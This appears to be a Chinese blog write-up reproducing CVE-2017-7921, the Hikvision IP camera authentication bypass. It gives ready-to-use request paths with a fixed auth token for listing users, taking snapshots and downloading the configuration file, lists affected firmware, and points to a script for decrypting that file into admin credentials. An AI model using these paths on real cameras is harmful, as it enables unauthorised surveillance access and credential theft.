Bootstrap

CVE-2017-7921漏洞复现

文章目录


漏洞描述

0x01 CVE-2017-7921漏洞复现

许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
在这里插入图片描述
0x02 漏洞复现:

利用工具发现漏洞(CVE-2017-7921):
在这里插入图片描述
利用路径:/Security/users?auth=YWRtaW46MTEK

附:检索所有用户及其角色的列表
在这里插入图片描述利用路径:/onvif-http/snapshot?auth=YWRtaW46MTEK

附:获取相机快照而不进行身份验证
在这里插入图片描述利用路径:

/System/configurationFile?auth=YWRtaW46MTEK

附:下载摄像头配置账号密码文件

在这里插入图片描述0x03 漏洞影响版本:

HikvisionDS-2CD2xx2F-ISeries5.2.0build140721

版本至5.4.0build160530版本;

DS-2CD2xx0F-ISeries5.2.0build140721

版本至5.4.0Build160401版本;

DS-2CD2xx2FWDSeries5.3.1build150410

版本至5.4.4Build161125版本;

DS-2CD4x2xFWDSeries5.2.0build140721

版本至5.4.0Build160414版本;

DS-2CD4xx5Series5.2.0build140721

版本至5.4.0Build160421版本;

DS-2DFxSeries5.2.0build140805

版本至5.4.5Build160928版本;

DS-2CD63xxSeries5.0.9build140305

版本至5.3.5Build160106版本

解密二进制文件(configurationFile)

1、脚本下载:

脚本链接:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor

2、脚本使用方法:

依赖库:pycryptodome
依赖库安装:python -m pip install pycryptodome
因为我的电脑安装了两个版本的python,所以使用py -3
解密命令:
python decrypt_configurationFile.py configurationFile
红框中的就是后台登陆的账号密码

在这里插入图片描述

;